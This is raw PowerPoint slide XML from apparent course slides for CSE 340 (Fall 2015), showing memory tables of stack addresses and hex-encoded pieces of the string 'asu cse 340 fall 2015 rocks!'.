                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73335187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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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175</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103622895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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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176</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195518677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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
